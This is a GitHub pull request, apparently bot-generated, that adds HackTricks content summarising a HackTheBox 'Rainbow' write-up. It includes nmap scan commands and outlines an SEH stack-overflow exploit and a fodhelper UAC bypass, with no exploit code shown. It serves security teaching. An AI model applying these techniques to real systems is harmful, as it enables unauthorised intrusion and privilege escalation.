HTB Rainbow

[carlospolop]

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

• Blog URL: https://0xdf.gitlab.io/2025/08/07/htb-rainbow.html
• Blog Title: HTB: Rainbow
• Suggested Section: Windows Exploitation - SEH-based Stack Overflow (nSEH/SEH, POP-POP-RET, jump-back technique) and Windows UAC Bypass (fodhelper)

🎯 Content Summary

HTB Windows Host: Rainbow HTTP Service SEH Overflow to RCE

Target: HTB Windows host exposing FTP(21), HTTP(80), RPC(135/49668), NetBIOS/SMB(139/445), RDP(3389), and a custom HTTP service on 8080.

Recon

Initial port sweep and service enumeration:

nmap -p- -vvv --min-rate 10000 10.129.234.59
nmap -p 21,80,135,139,445,3389,8080,49668 -sCV 10.129.234.59🔧 Technical Details
Crash-oriented fuzzing of custom HTTP services: When a bespoke webserver returns uniform pages and headers, fuzz POST body size and content. Watch for connection resets. A watchdog that restarts on crash (and even changes port, e.g., 8080–8090) enables rapid, safe iteration without service lockup.
SEH-based Windows stack overflow to RCE: For 32-bit Windows processes with overwritten SEH, find nSEH/SEH offsets using a cyclic pattern. Replace SEH with a module POP-POP-RET ga...
🤖 Agent Actions
Analysis and plan:

The blog provides detailed technical content on a 32-bit Windows SEH-based stack overflow exploit (nSEH/SEH, POP-POP-RET, short-jump into near-jump “jump-back” technique) and a Windows UAC bypass via fodhelper registry hijack. Both are highly relevant to HackTricks.
Repository review showed:

No dedicated page for Windows SEH-based exploitation in the binary-exploitation/stack-overflow section.
A general Windows exploitation (OSCP) page covers JMP ESP but not SEH-specific techniques.
UAC overview exists, but does not include a clear, step-by-step fodhelper technique. A C snippet exists elsewhere, but a procedural PS example should live in the UAC page.



What I updated/created:

New page: Windows SEH-based Stack Overflow Exploitation (nSEH/SEH)


Path: sr...


This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.
🗑️ File Cleanup

searchindex.js removed: This auto-generated file has been removed to prevent conflicts

The searchindex.js file is automatically generated and should not be included in manual commits.

[carlospolop]

🔗 Additional Context

Original Blog Post: https://0xdf.gitlab.io/2025/08/07/htb-rainbow.html

Content Categories: Based on the analysis, this content was categorized under "Windows Exploitation - SEH-based Stack Overflow (nSEH/SEH, POP-POP-RET, jump-back technique) and Windows UAC Bypass (fodhelper)".

Repository Maintenance:

• MD Files Formatting: 874 files processed

Review Notes:

• This content was automatically processed and may require human review for accuracy
• Check that the placement within the repository structure is appropriate
• Verify that all technical details are correct and up-to-date
• All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0

[carlospolop]

merge